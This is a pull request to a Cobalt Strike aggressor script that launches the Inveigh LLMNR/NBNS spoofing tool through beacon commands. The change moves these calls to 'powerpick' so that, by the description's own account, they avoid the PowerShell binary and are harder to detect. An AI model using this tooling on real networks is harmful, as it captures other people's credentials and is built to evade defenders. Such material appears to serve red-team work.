### PR TITLE
Replace powershell commands with powerpick

### DIFF
--- a/inveigh/inveigh.cna
+++ b/inveigh/inveigh.cna
@@ -8,7 +8,7 @@
 sub runPrivilegedInveigh {
 	$bid =  $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1"));
-	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
+	powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
 	prompt_text("How long would you like to run Inveigh (in minutes)?", "15", {
 		binput($bid, "powerpick Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
 		bpowerpick($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
@@ -18,7 +18,7 @@ sub runPrivilegedInveigh {
 sub runUnPrivilegedInveigh {
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
+	powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
 	prompt_text("How long would you like to run Inveigh (in minutes)?", "15", {
 		binput($bid, "powerpick Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
 		bpowerpick($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
@@ -28,14 +28,14 @@ sub runUnPrivilegedInveigh {
 sub stopInveigh{
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1"));
-	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
+	powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
 	bpowerpick($bid, "Stop-Inveigh");
 }
 
 sub stopInveigh-Unprivileged{
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
+	powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
 	bpowerpick($bid, "Stop-Inveigh");
 }
 

--- a/inveigh/inveigh.cna
+++ b/inveigh/inveigh.cna
@@ -8,7 +8,7 @@
 sub runPrivilegedInveigh {
 	$bid =  $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1"));
-	powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
+	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
 	prompt_text("How long would you like to run Inveigh (in minutes)?", "15", {
 		binput($bid, "powerpick Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
 		bpowerpick($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
@@ -18,7 +18,7 @@ sub runPrivilegedInveigh {
 sub runUnPrivilegedInveigh {
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
+	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
 	prompt_text("How long would you like to run Inveigh (in minutes)?", "15", {
 		binput($bid, "powerpick Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
 		bpowerpick($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
@@ -28,14 +28,14 @@ sub runUnPrivilegedInveigh {
 sub stopInveigh{
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1"));
-	powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
+	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
 	bpowerpick($bid, "Stop-Inveigh");
 }
 
 sub stopInveigh-Unprivileged{
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
+	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
 	bpowerpick($bid, "Stop-Inveigh");
 }
 

--- a/inveigh/inveigh.cna
+++ b/inveigh/inveigh.cna
@@ -8,35 +8,35 @@
 sub runPrivilegedInveigh {
 	$bid =  $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1"));
-	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
+	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
 	prompt_text("How long would you like to run Inveigh (in minutes)?", "15", {
-		binput($bid, "powershell Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
-		bpowershell($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
+		binput($bid, "powerpick Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
+		bpowerpick($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
 	});
 }
 
 sub runUnPrivilegedInveigh {
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
+	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
 	prompt_text("How long would you like to run Inveigh (in minutes)?", "15", {
-		binput($bid, "powershell Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
-		bpowershell($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
+		binput($bid, "powerpick Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
+		bpowerpick($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y");
 	});
 }
 
 sub stopInveigh{
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1"));
-	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
-	bpowershell($bid, "Stop-Inveigh");
+	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1"));
+	bpowerpick($bid, "Stop-Inveigh");
 }
 
 sub stopInveigh-Unprivileged{
 	$bid = $1;
 	binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
-	bpowershell($bid, "Stop-Inveigh");
+	bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1"));
+	bpowerpick($bid, "Stop-Inveigh");
 }
 
 popup beacon_bottom {


### PR DESCRIPTION
Powerpick doesn't call the powershell binary and is consequently more OPSEC-safe. This just changes the script to use powerpick when starting and stopping Inveigh.